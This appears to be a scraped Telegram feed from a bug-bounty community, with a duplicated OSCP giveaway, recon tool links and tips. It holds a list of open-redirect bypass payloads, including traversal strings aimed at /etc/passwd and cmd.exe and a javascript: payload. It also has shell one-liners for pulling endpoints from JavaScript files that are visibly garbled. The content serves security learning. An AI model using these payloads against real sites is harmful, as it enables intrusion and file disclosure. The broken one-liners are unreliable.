🚨 Vulncure Presents: FREE OSCP Voucher Giveaway! 🚨
🌟 Ready to take your cybersecurity career to the next level? 🌟
At Vulncure, we’re committed to securing the web with powerful cybersecurity solutions 🛡 — and now, we’re offering YOU the chance to secure your future too! 🎓🎉
Vulncure giving away a FREE OSCP Course + Cert Exam Bundle
(worth $1,649 💰) to one lucky winner!
🎉 This is YOUR chance to become an Offensive Security Certified Professional (OSCP) and boost your skills in ethical hacking and pentesting! 🚀💻
🎯 How to Enter:
• Follow Us 👉 Vulncure
• Like & Share this post with hashtag#OSCPwithVulncure 💬
• Tag 3 Friends who love cybersecurity as much as you do! 👩💻👨💻
Bonus: Tell us in the comments why YOU want to be OSCP certified! 💡
🎁 What You’ll Win:
• 💼 A full OSCP Voucher covering the exam fees
• 🔥 The opportunity to sharpen your penetration testing skills
• 🎓 A globally recognized certification to boost your career!
🏆 Why Participate?
• The OSCP is a GAME-CHANGER for aspiring ethical hackers, security professionals, and pentesters.
• 🎯 Whether you're just starting your cybersecurity journey or looking to level up your skills, the OSCP will take you there! 💪
🕒 Hurry! Entries close on 21st Oct!
• Don't miss this golden opportunity to kickstart your cybersecurity career with one of the most respected certifications in the industry! 🚀
Post Link : https://x.com/vulncure/status/1845650842461806616
⚡️ Bonus Entry: Double your chances of winning by signing up for our Cybersecurity Newsletter and get access to free tips and resources to ace your OSCP! 🔑 https://lnkd.in/gBvQ2qAu
📅 Winner Announcement:
The lucky winner will be announced on 25th Oct 🎉.
Stay tuned and keep an eye on your DMs! 👀
Good luck to everyone, and may the best hacker win! 🏅✨
👉 Enter now and level up with Vulncure + OSCP!
#OSCP #OSCPGiveaway #Cybersecurity #EthicalHacking #PenTesting #Vulncure
🌟 Ready to take your cybersecurity career to the next level? 🌟
At Vulncure, we’re committed to securing the web with powerful cybersecurity solutions 🛡 — and now, we’re offering YOU the chance to secure your future too! 🎓🎉
Vulncure giving away a FREE OSCP Course + Cert Exam Bundle
(worth $1,649 💰) to one lucky winner!
🎉 This is YOUR chance to become an Offensive Security Certified Professional (OSCP) and boost your skills in ethical hacking and pentesting! 🚀💻
🎯 How to Enter:
• Follow Us 👉 Vulncure
• Like & Share this post with hashtag#OSCPwithVulncure 💬
• Tag 3 Friends who love cybersecurity as much as you do! 👩💻👨💻
Bonus: Tell us in the comments why YOU want to be OSCP certified! 💡
🎁 What You’ll Win:
• 💼 A full OSCP Voucher covering the exam fees
• 🔥 The opportunity to sharpen your penetration testing skills
• 🎓 A globally recognized certification to boost your career!
🏆 Why Participate?
• The OSCP is a GAME-CHANGER for aspiring ethical hackers, security professionals, and pentesters.
• 🎯 Whether you're just starting your cybersecurity journey or looking to level up your skills, the OSCP will take you there! 💪
🕒 Hurry! Entries close on 21st Oct!
• Don't miss this golden opportunity to kickstart your cybersecurity career with one of the most respected certifications in the industry! 🚀
Post Link : https://x.com/vulncure/status/1845650842461806616
⚡️ Bonus Entry: Double your chances of winning by signing up for our Cybersecurity Newsletter and get access to free tips and resources to ace your OSCP! 🔑 https://lnkd.in/gBvQ2qAu
📅 Winner Announcement:
The lucky winner will be announced on 25th Oct 🎉.
Stay tuned and keep an eye on your DMs! 👀
Good luck to everyone, and may the best hacker win! 🏅✨
👉 Enter now and level up with Vulncure + OSCP!
#OSCP #OSCPGiveaway #Cybersecurity #EthicalHacking #PenTesting #Vulncure
X (formerly Twitter)
Vulncure (@vulncure) on X
🚨 FREE OSCP Voucher Giveaway 🚨
🏆Vulncure is giving away a FREE OSCP voucher! 🎓 Boost your skills with one of the most respected certification
To Enter : < 25th Oct
1️⃣ Follow @Vulncure
2️⃣ Like & RT
3️⃣ Tag 3 friends 👨💻👩💻
🎁 Bonus: Tell us why YOU want…
🏆Vulncure is giving away a FREE OSCP voucher! 🎓 Boost your skills with one of the most respected certification
To Enter : < 25th Oct
1️⃣ Follow @Vulncure
2️⃣ Like & RT
3️⃣ Tag 3 friends 👨💻👩💻
🎁 Bonus: Tell us why YOU want…
👍11😱2
🚀 Exciting News! 🚀
We're launching our Internship Program soon, and we'd love to hear from you!
What are your expectations for this opportunity? 🤔
Drop your thoughts below! ⬇️
@anukulhexx
We're launching our Internship Program soon, and we'd love to hear from you!
What are your expectations for this opportunity? 🤔
Drop your thoughts below! ⬇️
@anukulhexx
🥰13👍5❤3🔥3
🌟 Take a Break from Bug Bounty – Give Back with Divriti Foundation! 🌟
Hey, bug bounty hunters! I know we're all deeply involved in finding vulnerabilities, but sometimes it’s good to step back and make a positive impact in other ways. If you’ve got a little time to spare, come join me with Divriti Foundation and let’s give back to the community and the environment!
Divriti, based in Delhi, India, is leading initiatives in:
🌱 Environmental Conservation: Tree planting and sustainability efforts.
📚 Education: Supporting underprivileged students.
🐾 Animal Welfare: Caring for street animals.
and more..
And here’s a bonus: by volunteering, you’ll also have more chances to connect with me personally. I’d be happy to share bug bounty tips, guidance, and insights when we work together on initiatives. So if you’re interested in both community work and learning opportunities, this is the perfect chance!
WhatsApp Group Link to Join
💚 Let’s make time for nature and community. Together, we can make a real difference!
Hey, bug bounty hunters! I know we're all deeply involved in finding vulnerabilities, but sometimes it’s good to step back and make a positive impact in other ways. If you’ve got a little time to spare, come join me with Divriti Foundation and let’s give back to the community and the environment!
Divriti, based in Delhi, India, is leading initiatives in:
🌱 Environmental Conservation: Tree planting and sustainability efforts.
📚 Education: Supporting underprivileged students.
🐾 Animal Welfare: Caring for street animals.
and more..
And here’s a bonus: by volunteering, you’ll also have more chances to connect with me personally. I’d be happy to share bug bounty tips, guidance, and insights when we work together on initiatives. So if you’re interested in both community work and learning opportunities, this is the perfect chance!
WhatsApp Group Link to Join
💚 Let’s make time for nature and community. Together, we can make a real difference!
❤4👍2😍2
🐞 I’ve noticed a lot of beginners in bug bounty and pentesting feel pretty lost. Many are overwhelmed or unsure where to begin, so I put together some tips on common mistakes.
Read through these and see if you’re missing anything!
https://vulncure.com/PDF/Guide__Common_Mistakes_by_Bug_Hunters_.pdf
#bugbounty #infosec
Read through these and see if you’re missing anything!
https://vulncure.com/PDF/Guide__Common_Mistakes_by_Bug_Hunters_.pdf
#bugbounty #infosec
🥰22👍15❤5👏2🔥1🙏1🤡1
Hey everyone! 🌟 Hope you’re all doing well in your current phase. I’m looking for a skilled React Native developer to join us and help mitigate some ongoing challenges. If you’re interested or know someone who might be a great fit, please reach out to me at @rootxabhishek. Thanks!
👍4
⚠️ S3 Bucket Recon ⚠️
Source : https://github.com/securitycipher/awsome-websecurity-checklist/blob/main/Mindmaps/S3-Bucket%20Recon.png
Source : https://github.com/securitycipher/awsome-websecurity-checklist/blob/main/Mindmaps/S3-Bucket%20Recon.png
👍13🔥5👏1
⚡️uro - Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that.
🔗github.com/s0md3v/uro
🔗github.com/s0md3v/uro
😍6🔥4
☄️You can try this effective manual openredirect Bypass☄️
1. Null-byte injection:
- /google.com%00/
- //google.com%00
2. Base64 encoding variations:
- aHR0cDovL2dvb2dsZS5jb20=
- aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
- //base64:d3d3Lmdvb2dsZS5jb20=/
3. Case-sensitive variations:
- //GOOGLE.com/
- //GoOgLe.com/
4. Overlong UTF-8 sequences:
- %C0%AE%C0%AE%2F (overlong encoding for ../)
- %C0%AF%C0%AF%2F%2Fgoogle.com
5. Mixed encoding schemes:
- /%68%74%74%70://google.com
- //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
- //base64:%2F%2Fgoogle.com/
6. Alternative domain notations:
- //google.com@127.0.0.1/
- //127.0.0.1.xip.io/
- //0x7F000001/ (hexadecimal IP)
7. Trailing special characters:
- //google.com/#/
- //google.com/;&/
- //google.com/?id=123&//
8. Octal IP address format:
- http://0177.0.0.1/
- http://00177.0000.0000.0001/
9. IP address variants:
- http://3232235777 (decimal notation of an IP)
- http://0xC0A80001 (hex notation of IP)
- http://192.168.1.1/
10. Path traversal with encoding:
- /..%252f..%252f..%252fetc/passwd
- /%252e%252e/%252e%252e/%252e%252e/etc/passwd
- /..%5c..%5c..%5cwindows/system32/cmd.exe
11. Alternate protocol inclusion:
- ftp://google.com/
- javascript:alert(1)//google.com
12. Protocol-relative URLs:
- :////google.com/
- :///google.com/
13. Redirection edge cases:
- //google.com/?q=//bing.com/
- //google.com?q=https://another-site.com/
14. IPv6 notation:
- http://[::1]/
- http://[::ffff:192.168.1.1]/
15. Double URL encoding:
- %252f%252fgoogle.com (encoded twice)
- %255cgoogle.com
16. Combined traversal & encoding:
- /%2E%2E/%2E%2E/etc/passwd
- /%2e%2e%5c%2e%2e/etc/passwd
17. Reverse DNS-based:
- https://google.com.reverselookup.com
- //lookup-reversed.google.com/
18. Non-standard ports:
- http://google.com:81/
- https://google.com:444/
19. Unicode obfuscation in paths:
- /%E2%80%8Egoogle.com/
- /%C2%A0google.com/
20. Query parameters obfuscation:
- //google.com/?q=http://another-site.com/
- //google.com/?redirect=https://google.com/
21. Using @ symbol for userinfo:
- https://admin:password@google.com/
- http://@google.com
22. Combination of userinfo and traversal:
- https://admin:password@google.com/../../etc/passwd
1. Null-byte injection:
- /google.com%00/
- //google.com%00
2. Base64 encoding variations:
- aHR0cDovL2dvb2dsZS5jb20=
- aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
- //base64:d3d3Lmdvb2dsZS5jb20=/
3. Case-sensitive variations:
- //GOOGLE.com/
- //GoOgLe.com/
4. Overlong UTF-8 sequences:
- %C0%AE%C0%AE%2F (overlong encoding for ../)
- %C0%AF%C0%AF%2F%2Fgoogle.com
5. Mixed encoding schemes:
- /%68%74%74%70://google.com
- //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
- //base64:%2F%2Fgoogle.com/
6. Alternative domain notations:
- //google.com@127.0.0.1/
- //127.0.0.1.xip.io/
- //0x7F000001/ (hexadecimal IP)
7. Trailing special characters:
- //google.com/#/
- //google.com/;&/
- //google.com/?id=123&//
8. Octal IP address format:
- http://0177.0.0.1/
- http://00177.0000.0000.0001/
9. IP address variants:
- http://3232235777 (decimal notation of an IP)
- http://0xC0A80001 (hex notation of IP)
- http://192.168.1.1/
10. Path traversal with encoding:
- /..%252f..%252f..%252fetc/passwd
- /%252e%252e/%252e%252e/%252e%252e/etc/passwd
- /..%5c..%5c..%5cwindows/system32/cmd.exe
11. Alternate protocol inclusion:
- ftp://google.com/
- javascript:alert(1)//google.com
12. Protocol-relative URLs:
- :////google.com/
- :///google.com/
13. Redirection edge cases:
- //google.com/?q=//bing.com/
- //google.com?q=https://another-site.com/
14. IPv6 notation:
- http://[::1]/
- http://[::ffff:192.168.1.1]/
15. Double URL encoding:
- %252f%252fgoogle.com (encoded twice)
- %255cgoogle.com
16. Combined traversal & encoding:
- /%2E%2E/%2E%2E/etc/passwd
- /%2e%2e%5c%2e%2e/etc/passwd
17. Reverse DNS-based:
- https://google.com.reverselookup.com
- //lookup-reversed.google.com/
18. Non-standard ports:
- http://google.com:81/
- https://google.com:444/
19. Unicode obfuscation in paths:
- /%E2%80%8Egoogle.com/
- /%C2%A0google.com/
20. Query parameters obfuscation:
- //google.com/?q=http://another-site.com/
- //google.com/?redirect=https://google.com/
21. Using @ symbol for userinfo:
- https://admin:password@google.com/
- http://@google.com
22. Combination of userinfo and traversal:
- https://admin:password@google.com/../../etc/passwd
🔥10👍7❤3👏2
🔖AWS penetration testing: A step-by-step Guide for Beginners
☄️https://www.hackthebox.com/blog/aws-pentesting-guide
☄️https://www.hackthebox.com/blog/aws-pentesting-guide
⚡7🥰4👏4❤3
🔖Ex-param - an automated tool designed for finding reflected parameters for XSS vulnerabilities
✅https://github.com/rootDR/ex-param
✅https://github.com/rootDR/ex-param
🔥14👍2🥱1
This media is not supported in your browser
VIEW IN TELEGRAM
🔍 gitlab-subdomains - A Go-based tool to uncover subdomains via GitLab searches.
🔗https://github.com/gwen001/gitlab-subdomains
🔗https://github.com/gwen001/gitlab-subdomains
👏8👍3❤1
Extract all endpoints from a JS File and take your bug 🐞
✅Method one
✅Method two
#infosec #cybersec #bugbountytips
✅Method one
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
✅Method two
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt
#infosec #cybersec #bugbountytips
👍19🥰3❤2
⚡️Want to download 100+ Bug Bounty Tips collected from X?
✅Download the PDF from here
#BugBounty #bugbountytips
✅Download the PDF from here
#BugBounty #bugbountytips
❤5👍3🔥1
🔖 Dnsbruter - A powerful tool for active subdomain enumeration and discovery.
✨ Features:
Dnsbruter uses DNS resolution to bruteforce and identify subdomains efficiently. Its multithreading capability allows users to control concurrency for faster and more effective results. Perfect for researchers and pen testers targeting domain reconnaissance.
🔗 https://github.com/RevoltSecurities/Dnsbruter/
✨ Features:
Dnsbruter uses DNS resolution to bruteforce and identify subdomains efficiently. Its multithreading capability allows users to control concurrency for faster and more effective results. Perfect for researchers and pen testers targeting domain reconnaissance.
🔗 https://github.com/RevoltSecurities/Dnsbruter/
❤11👍5